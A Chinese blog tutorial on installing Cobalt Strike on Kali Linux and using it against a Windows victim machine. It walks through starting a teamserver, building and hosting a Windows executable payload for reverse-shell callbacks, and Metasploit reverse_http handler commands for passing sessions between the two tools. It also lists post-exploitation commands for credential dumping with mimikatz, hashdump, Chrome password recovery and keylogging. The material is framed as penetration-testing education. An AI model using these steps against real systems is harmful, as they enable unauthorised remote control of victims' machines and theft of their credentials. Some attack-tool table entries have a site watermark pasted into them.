Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。

Cobalt Strike kali install

环境介绍

  • kali linux 2021
  • Cobalt Strike4.3
  • windows10(受害机)

在kali中安装Cobalt Strike

在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。
start.jpg
这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:

./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码

Cobalt Strike界面介绍

生成shell

首先配置监听
和msfconsole类似,Cobalt Strike也要配置监听。
Cobalt Strike——Listeners——Add
payload
相关参数说明:

参数说明
name监听任务的名称 可随意
payload监听的方式 支持http https TCP
HTTPS HOSTS主机IP地址
Host Rotation Strategy主机转移策略 一般默认即可

生成shell
AttacksPackages——windows ececutable

shell
配置windows平台下的shell
windows shell
保存生成的shell
save shell

参数说明
HTML Application基于http方式的攻击,如受害者打开网站即可获得shell
MS Office Macrooffice宏攻击,如打开word文档即可获得shell
Payload Generator其他方式的payload,如C python vb
windows ececutable生成windows平台下的shell

Shell上线
将生成的shell放到/var/www/html,并启动apache服务器

cp kali.exe /var/www/html
service apache2 start

当目标主机下载并运行shell后,我们便可以看到回弹。
目标主机上线

对目标主机的操作

对目标主机的操作

interact 命令模式

当我们点击interact后,便会和msfconsole一样,进入命令模式。
现列出常用的命名

参数说明
argue匹配进程的欺骗参数
blockdlls阻止子进程中的非Microsoft DLL
browserpivot设置浏览器会话
cancel取消正在进行的下载
cd改变目录位置
checkin呼叫总部并发布数据
chromedump从Google Chrome恢复凭据
clear清除信标队列
connect通过TCP连接到目标
covertvpn部署隐蔽VPN客户端
cp复制文件
dcsync从DC提取密码哈希
desktop查看目标桌面并与之交互
dllinjectbbskali.cn
dllload将反射DLL注入进程
download文件下载
downloads列出正在下载的文件
drives列出目标上的驱动器
elevate在提升的上下文中生成会话
exit关闭当前连接
getprivs对当前令牌启用系统权限
getsystem提升系统权限
getuid获取用户ID
hashdump导出hash密码
keylogger记录键盘
killKill 掉进程
logonpasswords使用mimikatz转储凭据和哈希
ls列出文件列表 bbskali.cn
make_token创建一个 token
mimikatz运行神器 mimikatz
mkdir创建一个目录
mv移动文件
net网络和主机枚举
upload上传文件

如获取C盘文件信息

cd /
ls

C盘文件信息

和目标屏幕交互

desktop

桌面交互

其他菜单操作

由于比较多,就不一个个说了。把常用的几个菜单说说。

可视化的文件浏览

Explore-File Browser
文件浏览
对局域网内所有设备扫描

显示目标的所有进程
进程

Cobalt Strike与Msfconsole联动

首先我们在Cobalt Strike中创建一个新的Foreign Http监听

然后在msfconsole中配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit

返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听

这时,我们返回到msf中便可以看到成功得到回弹。

将msf会话转移到Cobalt Strike

一样,我们先建立一个http的监听

因为在msf中我们已经获得了session
在其配置如下:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run


set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。
然后我们返回到Cobalt Strike这时便可以看到会话了

其他文章推荐

《Cobalt Strike 目标上线微信提示》
《Cobalt Strike入坑指南(利用office文件获取shell)》

未完待续……

赞赏: 111.00 元

温馨提示:免登录赞赏后1天内可重复阅读隐藏内容,登录付款后可永久阅读隐藏的内容。 赞赏可读
Last modification:June 28th, 2021 at 03:41 pm
正在沿街乞讨中……